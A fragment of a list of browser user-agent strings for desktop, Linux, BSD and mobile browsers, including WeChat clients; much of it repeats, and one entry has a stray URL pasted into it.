'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
